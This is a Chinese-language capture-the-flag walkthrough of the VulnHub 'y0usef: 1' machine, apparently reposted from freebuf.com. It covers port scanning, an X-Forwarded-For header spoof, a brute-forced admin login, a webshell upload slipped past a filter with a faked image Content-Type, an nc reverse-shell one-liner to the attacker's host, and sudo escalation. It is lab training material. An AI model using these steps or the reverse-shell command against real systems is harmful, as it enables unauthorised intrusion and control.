y0usef: 1
基本信息
难度:简单 操作比较容易,但是有的地方需要开一开脑洞,发挥一下想象力
靶机搭建
下载镜像导入成功1运行之后会显示该界面
链接:https://www.vulnhub.com/entry/y0usef-1,624/
主机发现与端口扫描
因为靶机与kali在同一个网段下可以使用nmap扫描获取靶机地址
nmap 192.168.56.0/24
发现靶机地址为192.168.56.105
对改地址进行详细的端口扫描
nmap -sV -p- -A 192.168.56.105
获取到开放了22,80端口以及版本信息
访问80端口发现页面中没有什么可以利用的信息
使用dirb进行扫描但是没有发现可利用信息,可能是字典不够强大
换一个工具再试一下,使用dirsearch进行扫描,发现存在301重定向页面
访问查看一下
可以尝试一下通过burp抓包增加一个请求头看看能否实现重定向
请求头:X-Forwarded-For:127.0.0.1
成功进入到登录界面
可以使用burp进行暴力破解
使用最常用的top100字典进行破解就可以
破解之后发现这是最简单的弱口令密码
注:需要添加请求头才可以
发现账号和密码都是admin,进行登录
登录成功,发现可以上传文件,尝试上传木马使用哥斯拉进行连接
发现直接长传.php文件会被过滤
使用burp修改数据包进行绕过,一般当Content-Type为图片类型时可以成功上传
这里使用image/png进行修改
上传成功获得路径
http://192.168.56.105/adminstration/upload/files/16127499112.php
使用哥斯拉进行连接
成功连接
获取shell
进入命令行反弹shell,使用nc进行连接
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 1234>/tmp/f
成功反弹shell
建立交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
在home目录下发现user.txt进行查看发现是base64加密
解密之后获得账号与密码
user : yousef
pass : yousef123
通过ssh建立远程连接获取一个稳定的操作环境
提权
sudo -l
查看可使用命令
发现yousef可以执行所有命令
直接su root 获取root权限
成功提权
进入root目录下获取最后一个flag
解密之后获取答案
来源:freebuf.com 2021-02-08 10:23:31 by: WAFmax
请登录后发表评论
注册